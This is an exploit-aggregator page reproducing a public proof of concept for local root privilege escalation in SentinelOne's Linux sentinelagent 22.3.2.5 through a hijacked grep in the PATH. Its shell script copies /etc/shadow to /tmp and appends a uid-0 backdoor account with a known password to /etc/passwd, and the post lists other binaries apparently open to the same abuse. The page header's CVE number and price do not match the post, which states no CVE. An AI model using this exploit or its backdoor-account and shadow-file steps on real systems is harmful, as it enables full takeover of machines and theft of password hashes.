Advertisement






SentinelOne sentinelagent 22.3.2.5 Privilege Escalation

CVE Category Price Severity
CVE-2021-20722 CWE-427 $5000 Critical
Author Risk Exploitation Type Date
Unknown Critical Local 2022-12-07
CVSS
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022120014

Below is a copy:

SentinelOne sentinelagent 22.3.2.5 Privilege Escalation
Exploit Title: SentinelOne sentinelagent (linux) root Privilege Escalation zero day vulnerability
Date: 12/06/2022
Exploit Author: ouch_this_hurts
Vendor Homepage: https://www.sentinelone.com/
Software Link: https://assets.sentinelone.com/prod/s1-linux-agent-datas
Version: 22.3.2.5
Tested on: Ubuntu 22.04.x
CVE: NA

Not enough AI in the world can help you write secure software it seems? The vendor doesnt make reporting vulnerabilities easy, so to exploit-db it goes :)

Protips:
- If I Google you, and I cannot find an easy way to report the vulnerability, I'm not going to bother.
- If you require me to use HackerOne, I'm not going to bother.
- If you dont have a security.txt, how do you expect me to contact you?

Get `root` on a system with `sentinelagent<=22.3.2.5` with one simple trick:

Override `grep` in the `PATH` with your malicious code. Reboot. pwnd. Nice!

PoC below:
1. Find the systems "earliest" `PATH`, or just override it to whatever you want in `/etc/environment` with some other staged exploit.
2. Create the following `grep` file in that directory and make sure its executable:

    ```shell
    cat << SENTINELOOPS > /usr/local/bin/grep
    #!/bin/bash
    # I think I'll have the passwds pl0x
    cat /etc/shadow > /tmp/etc_shadow

    # password is password :)
    echo 'sentinel_oops:\$1\$user1\$WuzQ29wbcMN09VLW7X0/q1:0:0::/root:/bin/sh' >> /etc/passwd
    SENTINELOOPS

    chmod +x /usr/local/bin/grep
    ```

3. Wait for machine to reboot, login as `sentinel_oops:password` :)

    ```
    $ su sentinel_oops
    Password: 
    # whoami 
    root
    ```

What actually happened here? On `sentinelagent` start it runs `sh -c "grep...."`.

So there are potentially other ways of privilege escalation via this "agent"?
- `grep` as demonstrated above
- `pgrep` examining the binary appears to be vulnerable
- `xargs` examining the binary appears to be vulnerable
- `cat` examining the binary appears to be vulnerable
- `pgrep` examining the binary appears to be vulnerable
- `ldd` examining the binary appears to be vulnerable
- `lsmod` examining the binary appears to be vulnerable
- `mksh` examining the binary appears to be vulnerable
- `awk` examining the binary appears to be vulnerable

[CWE-427](https://cwe.mitre.org/data/definitions/427.html) and [how to write secure software](https://youtu.be/RfiQYRn7fBg?t=16)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.